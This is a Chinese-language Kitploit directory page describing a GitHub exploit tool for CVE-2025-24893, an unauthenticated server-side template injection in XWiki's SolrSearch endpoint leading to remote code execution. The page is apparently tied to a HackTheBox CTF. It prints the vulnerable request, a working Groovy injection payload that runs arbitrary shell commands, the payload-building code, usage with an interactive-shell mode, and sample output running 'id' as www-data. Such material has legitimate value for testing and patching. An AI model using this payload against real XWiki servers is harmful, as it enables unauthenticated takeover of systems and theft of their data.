Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – XWiki SSTI未授权RCE漏洞利用(HackTheBox CTF) | Kitploit
工具/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – XWiki SSTI未授权RCE漏洞利用(HackTheBox CTF)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
24个月前尚未审核

CVE-2025-24893 — XWiki SSTI 远程代码执行

概述

字段详情
CVECVE-2025-24893
软件XWiki
漏洞服务端模板注入 (SSTI) → 远程代码执行 (RCE)
认证不需要
CVSS 评分严重
背景在 HackTheBox CTF 期间发现

描述

XWiki 暴露了一个 SolrSearch 端点 (/xwiki/bin/get/Main/SolrSearch),该端点直接将用户输入渲染到 Groovy 模板引擎中,且未进行任何清理。未认证的攻击者可以通过 text 查询参数注入 Groovy 表达式,从而在底层服务器上实现远程代码执行。

技术细节

脆弱端点

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

注入机制

text 参数被直接嵌入到 XWiki 宏上下文中,并由 Groovy 引擎求值。注入点使用 }}} 转义模板上下文,并打开 {{async}}{{groovy}} 代码块:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

输出结果会在 RSS 响应体中回显,并可通过正则表达式提取。

载荷结构

root@kitploit:~
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

响应为 XML/RSS 格式 —— 命令输出出现在 [}}} 和 ]</ 标记之间,且包含 HTML 转义字符。

使用方法

root@kitploit:~
python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]

示例

root@kitploit:~
# 单条命令
python3 exploit.py -t wiki.target.htb -c "id"

# 交互式 Shell
python3 exploit.py -t wiki.target.htb -i

# 自定义端口 HTTPS
python3 exploit.py -t wiki.target.htb -p 443 -s -i

依赖项

root@kitploit:~
pip install requests termcolor

概念验证

root@kitploit:~
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

参考

  • XWiki 官方公告
  • NVD 条目
下载工具
标志描述
-t目标主机名或 IP
-p端口(默认:80)
-s使用 HTTPS
-i交互式 Shell 模式
-c单次命令执行
-v详细输出